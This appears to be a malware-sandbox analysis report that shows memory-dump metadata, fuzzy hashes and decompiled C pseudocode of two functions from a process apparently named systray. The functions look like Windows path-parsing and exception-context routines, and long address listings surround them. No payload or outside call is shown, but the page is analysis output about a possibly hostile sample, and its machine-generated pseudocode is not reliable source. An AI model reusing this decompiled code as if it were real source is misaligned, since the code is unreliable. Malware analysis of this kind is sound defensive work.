0x04666260
0x04666260
0x04666260
0x04666260
0x0466625e
0x04666264
0x04666267
0x04666269
0x04666315
0x04666315
0x0466631b
0x0466631e
0x04666324
0x04666327
0x0466632f
0x04666330
0x04666333
0x0466633a
0x0466633c
0x04666335
0x04666335
0x04666335
0x0466633f
0x04666342
0x0466634c
0x04666352
0x04666355
0x04666355
0x04666359
0x00000000
0x0466626f
0x04666275
0x04666275
0x04666278
0x0466627e
0x0466627e
0x04666281
0x04666287
0x0466628d
0x04666298
0x0466629c
0x046662a2
0x0466629e
0x0466629e
0x0466629e
0x046662a7
0x046662a7
0x046662aa
0x046662b0
0x046662f0
0x046662f0
0x046662f2
0x046662f8
0x046662fd
0x046662b2
0x046662b2
0x046662b2
0x046662b5
0x046662dd
0x046662e2
0x046662e5
0x046662b7
0x046662b8
0x046662bb
0x046662bd
0x046662c0
0x046662c4
0x046662cd
0x046662cd
0x046662c0
0x046662bb
0x046662b5
0x04666302
0x04666303
0x04666305
0x04666305
0x04666305
0x0466630c
0x0466630c
0x00000000
0x0466627e
0x04666269
0x04665eac
0x04665ebb
0x04665ebe
0x04665ecb
0x04665ecb
0x04665ece
0x04665ece
0x04665ed4
0x04665ed7
0x04665ed9
0x04665edb
0x04665edb
0x04665ee1
0x04665ee1
0x04665ee3
0x04665f20
0x04665f20
0x04665ee5
0x04665ee5
0x04665ee5
0x04665ee8
0x04665f11
0x04665f18
0x04665eea
0x04665eea
0x04665eed
0x04665ef2
0x04665ef8
0x04665efb
0x04665f0a
0x04665f0a
0x04665eed
0x04665ee8
0x04665f22
0x04665f28
0x00000000
0x00000000
0x04665f30
0x04665f31
0x04665f37
0x04665f3a
0x04665f3d
0x04665f44
0x00000000
0x00000000
0x00000000
0x04665f46
0x04665f48
0x04665f4d
0x00000000
0x04665f4d
0x04665dda
0x04665ddf
0x00000000
0x04665ddf
0x04665dd8
0x04665da7
0x04665da9
0x04665dac
0x04665dae
0x00000000
0x04665db4
0x04665db4
0x00000000
0x04665db4
0x04665dae
0x04665d88
0x04665d8d
0x04666363
0x04666369
0x0466636a
0x04666370
0x04666372
0x0466637a
0x0466637b
0x0466637d
0x00000000
0x00000000
0x0466637f
0x04666385
0x00000000
0x04666385
0x04665d38
0x04665d3b
0x00000000
0x00000000
0x00000000
0x04665d3b
0x04665d27
0x04665d29
0x00000000
0x00000000
0x00000000
0x04666360
0x00000000
0x04666360
0x04665c10
0x04665c10
0x046663da
0x046663e5
0x046663e5

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a7bbb33baa464af85e3257c0bb3ba26da0ee53d8c3c0ede4878722b63276eb1
Instruction ID: 3cd17efa3f77c2e5d2bac68b2e9b54a64ecf40d8c89d7e524113553ae9fca3de
Opcode Fuzzy Hash: 2a7bbb33baa464af85e3257c0bb3ba26da0ee53d8c3c0ede4878722b63276eb1
Instruction Fuzzy Hash: 2A425B71A00229DFDB24CF68D881BA9B7B1FF55304F1481AAD94EEB342E734A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 045B4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E045B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x468d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E045CF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E045B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L045B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E045B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M045B45F8))) {
												case 0:
													_v568 = 0x4571078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x45711c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L045B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E045DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E045DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E045952A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E045AEB70(1, 0x46879a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E045AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E045D95D0();
																			L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E045DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E045D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E045DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x045b4128
0x045b4135
0x045b413c
0x045b4141
0x045b4145
0x045b4147
0x045b414e
0x045b4151
0x045b4159
0x045b415c
0x045b4160
0x045b4164
0x045b4168
0x045b416c
0x045b417f
0x045b4181
0x045b446a
0x045b446a
0x045b418c
0x045b4195
0x045b4199
0x045b4432
0x045b4439
0x045b443d
0x045b4442
0x045b4447
0x00000000
0x045b419f
0x045b41a3
0x045b41b1
0x045b41b9
0x045b41bd
0x045b45db
0x045b45db
0x00000000
0x045b41c3
0x045b41c3
0x045b41ce
0x045b41d4
0x045fe138
0x045fe13e
0x045fe169
0x045fe16d
0x045fe19e
0x045fe16f
0x045fe16f
0x045fe175
0x045fe179
0x045fe18f
0x045fe193
0x00000000
0x045fe199
0x00000000
0x045fe199
0x045fe193
0x00000000
0x00000000
0x00000000
0x045b41da
0x045b41da
0x045b41df
0x045b41e4
0x045b41ec
0x045b4203
0x045b4207
0x045fe1fd
0x045b4222
0x045b4226
0x045fe1f3
0x045fe1f3
0x045b422c
0x045b422c
0x045b4233
0x045fe1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x045b4239
0x045b4239
0x045b4239
0x045b4239
0x045b4233
0x045b4226
0x045b41ee
0x045b41ee
0x045b41f4
0x045b4575
0x045fe1b1
0x045fe1b1
0x00000000
0x045b457b
0x045b457b
0x045b4582
0x045fe1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x045b4588
0x045b4588
0x045b458c
0x045fe1c4
0x045fe1c4
0x00000000
0x045b4592
0x045b4592
0x045b4599
0x045fe1be
0x00000000
0x00000000
0x00000000
0x00000000
0x045b459f
0x045b459f
0x045b45a3
0x045fe1d7
0x045fe1e4
0x00000000
0x045b45a9
0x045b45a9
0x045b45b0
0x045fe1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x045b45b6
0x045b45b6
0x045b45b6
0x00000000
0x045b45b6
0x045b45b0
0x045b45a3
0x045b4599
0x045b458c
0x045b4582
0x00000000
0x00000000
0x00000000
0x00000000
0x045b41f4
0x045b423e
0x045b4241
0x045b45c0
0x045b45c4
0x00000000
0x045b45ca
0x045b45ca
0x00000000
0x045fe207
0x045fe20f
0x00000000
0x00000000
0x00000000
0x00000000
0x045b45d1
0x00000000
0x00000000
0x045b45ca
0x00000000
0x045b4247
0x045b4247
0x045b4247
0x045b4249
0x045b4249
0x045b4249
0x045b4251
0x045b4251
0x045b4257
0x045b425f
0x045b426e
0x045b4270
0x045b427a
0x045fe219
0x045fe219
0x045b4280
0x045b4282
0x045b4456
0x045b45ea
0x00000000
0x045b45f0
0x045fe223
0x00000000
0x045fe223
0x045b445c
0x045b445c
0x00000000
0x045b445c
0x00000000
0x045b4288
0x045b428c
0x045fe298
0x045b4292
0x045b4292
0x045b429e
0x045b42a3
0x045b42a7
0x045b42ac
0x045fe22d
0x045b42b2
0x045b42b2
0x045b42b9
0x045b42bc
0x045b42c2
0x045b42ca
0x045b42cd
0x045b42cd
0x045b42d4
0x045b433f
0x045b433f
0x045b42d6
0x045b42d6
0x045b42d9
0x045b42dd
0x045b42eb
0x045fe23a
0x045b42f1
0x045b4305
0x045b430d
0x045b4315
0x045b4318
0x045b431f
0x045b4322
0x045b432e
0x045b433b
0x045b433b
0x00000000
0x045b432e
0x045b42eb
0x045b434c
0x045b434e
0x045b4352
0x045b4359
0x045b435e
0x045b4361
0x045b436e
0x045b438a
0x045b438e
0x045b4396
0x045b439e
0x045b43a1
0x045b43ad
0x045b43bb
0x045b43bb
0x045b43ad
0x045b436e
0x045b43bf
0x045b43c5
0x045b4463
0x045b4463
0x045b43ce
0x045b43d5
0x045b43d9
0x045b43df
0x045b4475
0x045b4479
0x045b4491
0x045b4491
0x045b4479
0x045b43e5
0x045b43eb
0x045b43f4
0x045b43f6
0x045b43f9
0x045b43fc
0x045b43ff
0x045b44e8
0x045b44ed
0x045b44f3
0x045fe247
0x00000000
0x045b44f9
0x045b4504
0x045b4508
0x045b450f
0x045fe269
0x00000000
0x045b4515
0x045b4519
0x045b4531
0x045b4534
0x045b4537
0x045b453e
0x045b4541
0x045b454a
0x045fe255
0x045fe255
0x045fe25b
0x045fe25e
0x045fe261
0x045fe261
0x045b4555
0x045b4559
0x045b455d
0x045fe26d
0x045fe270
0x045fe274
0x045fe27a
0x045fe27d
0x045fe28e
0x045fe28e
0x045b4563
0x045b4563
0x045b4569
0x045b4569
0x00000000
0x045b455d
0x045b450f
0x00000000
0x045b44f3
0x045b43ff
0x045b4405
0x045b4405
0x045b4405
0x045b42ac
0x045b428c
0x045b4282
0x045b4407
0x045b440d
0x045fe2af
0x045fe2af
0x045b4413
0x045b4413
0x00000000
0x045b41d4
0x00000000
0x045b41c3
0x045b41bd
0x045b4415
0x045b4415
0x045b4416
0x045b4417
0x045b4429
0x045b416e
0x045b416e
0x045b4175
0x045b4498
0x045b449f
0x045fe12d
0x00000000
0x045fe133
0x00000000
0x045fe133
0x045b44a5
0x045b44a5
0x045b44aa
0x00000000
0x045b44bb
0x045b44ca
0x045b44d6
0x045b44d7
0x045b44d8
0x045b44e3
0x045b44e3
0x045b44aa
0x045b417b
0x045b417b
0x045b417b
0x00000000
0x045b417b
0x045b4175
0x00000000

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708ae5b177bdfca38e03daad6504e26d1a63d9c96262291e65e2007aede43e63
Instruction ID: 00f7e5285d624ffc401153f157073f3a43e1df2d86c8bb52c7b27a9afc2a4ceb
Opcode Fuzzy Hash: 708ae5b177bdfca38e03daad6504e26d1a63d9c96262291e65e2007aede43e63
Instruction Fuzzy Hash: E2F16F706082518BC724CF59D881A7AB7E1FF89704F14892EF5C5CB2A1E734E895EB92

Uniqueness

Uniqueness Score: -1.00%

Function 045C513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E045C513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x468d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E045DD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E045B2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L045B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E045DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E045AFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x468b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E045DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x045c5142
0x045c514c
0x045c5150
0x045c5157
0x045c5159
0x045c515e
0x045c5165
0x045c5169
0x045c516c
0x045c5172
0x045c5176
0x045c517a
0x045c517a
0x045c517a
0x045c517f
0x04606d8b
0x04606d8e
0x04606d91
0x04606d95
0x04606d98
0x04606d9c
0x04606da0
0x04606da3
0x04606da7
0x04606e26
0x04606e26
0x04606e2a
0x045c51f9
0x045c51f9
0x045c51fe
0x04606e33
0x04606e33
0x04606e39
0x04606e3d
0x04606e46
0x04606e50
0x00000000
0x00000000
0x04606e52
0x04606e53
0x04606e56
0x04606e5d
0x00000000
0x00000000
0x00000000
0x04606e5f
0x04606e67
0x04606e77
0x04606e7f
0x04606e80
0x04606e88
0x04606e90
0x04606e9f
0x04606ea5
0x04606ea9
0x04606eb1
0x04606ebf
0x00000000
0x00000000
0x04606ecf
0x04606ed3
0x00000000
0x00000000
0x04606edb
0x04606ede
0x04606ee1
0x04606ee8
0x04606eeb
0x04606eed
0x04606ef0
0x04606ef4
0x04606ef8
0x04606efc
0x00000000
0x00000000
0x04606f0d
0x04606f11
0x04606f32
0x04606f37
0x04606f3b
0x04606f3e
0x04606f41
0x04606f46
0x00000000
0x00000000
0x04606f4c
0x04606f50
0x04606f50
0x04606f54
0x04606f62
0x04606f65
0x04606f6d
0x04606f7b
0x04606f7b
0x04606f93
0x04606f98
0x04606fa0
0x04606fa6
0x04606fb3
0x04606fb6
0x04606fbf
0x04606fc1
0x04606fd5
0x04606fda
0x04606fda
0x04606fdd
0x04606fe2
0x04606fe7
0x04606feb
0x04606fef
0x04606ff3
0x045c520c
0x045c520c
0x045c520f
0x045c5215
0x045c5234
0x045c523a
0x045c523a
0x045c5244
0x045c5245
0x045c5246
0x045c5251
0x045c5251
0x04606f13
0x04606f17
0x04606f17
0x04606f18
0x04606f1b
0x04606f1f
0x04606f23
0x00000000
0x04606f28
0x045c5204
0x045c5204
0x045c5208
0x00000000
0x045c5208
0x045c5185
0x045c5188
0x045c518a
0x045c518e
